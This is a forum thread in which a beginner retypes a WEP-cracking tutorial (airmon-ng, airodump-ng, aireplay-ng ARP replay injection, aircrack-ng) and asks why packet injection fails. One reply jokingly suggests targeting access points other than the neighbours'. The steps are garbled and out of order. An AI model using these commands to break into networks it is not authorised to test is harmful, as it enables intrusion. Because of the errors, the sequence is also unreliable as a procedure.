Results 1 to 4 of 4

Thread: Noob in need of help please!

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    8

    Unhappy Noob in need of help please!

    First off, I'm using a Dell Inspiron 1501 with a Broadcom 4311 wireless card. It works with Linux 'cause when I boot the BT 3.0 Final LiveCD and open up the wireless assistant, I can connect to my home network.

    I found a tutorial everyone else claims works great, but I can't get it to work for me. I can't find the damn site again, so I'll just type it out. I just wanna know if there's anything in this tutorial that's wrong and could be causing my problems. I'm typing it out word for word from a copy I printed out, so obviously some things like the channel of the target and stuff will vary.

    The problem I'm having is that it won't sent packets and it won't get ARP requests.

    ----------
    TUTORIAL
    ----------
    1. Setting up the card

    Stop the adapter using this command:

    airmon-ng stop eth1

    Next:

    ifconfig eth1 down

    2. Finding an AP

    Open a new Konsole and type:

    airodump-ng eth1

    Close that Konsole and go back to the first one we opened and type:

    airodump-ng --ivs --channel 6 -w /root/wepivs eth1

    Open a new Konsole and type:

    airmon-ng start eth1 6

    3. Packet injection
    (This is where I encounter my problem of not getting ARPs.)

    aireplay-ng -3 -b "TARGET MAC" -h "CARD MAC" eth1

    Open a new Konsole and type:

    airmon-ng start eth1 6

    4. Cracking the WEP

    aircrack-ng -s /root/wepivs-01.ivs

    That's where it ends. Is there a step missing? Are some steps outta order?

    If there doesn't seem to be anything wrong here, can you maybe link me to another tutorial known to work well for everyone?

  2. #2

    Default

    Sometimes it fails, try diferent access points, not just your neighbors . . .
    :cool:
    :cool:
    Alienware M17x - Intel Core 2 Quad Extreme QX9300
    Dual Nvidia GeForce GTX 280M GPUs
    8GB DDR3-1333 RAM
    Dual 500GB
    :cool:
    :cool:

  3. #3
    Member zWiReDz's Avatar
    Join Date
    Sep 2009
    Posts
    123

    Default

    Quote Originally Posted by athacks View Post
    Sometimes it fails, try diferent access points, not just your neighbors . . .
    Lol don't jump to conclusions or anything athacks
    "If it's stupid but works, it's not stupid." - Murphy's Laws of combat, #2

  4. #4

    Default

    Just wanted to say something many people do, but dont take it on too hard or seriously XD
    :cool:
    :cool:
    Alienware M17x - Intel Core 2 Quad Extreme QX9300
    Dual Nvidia GeForce GTX 280M GPUs
    8GB DDR3-1333 RAM
    Dual 500GB
    :cool:
    :cool:

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •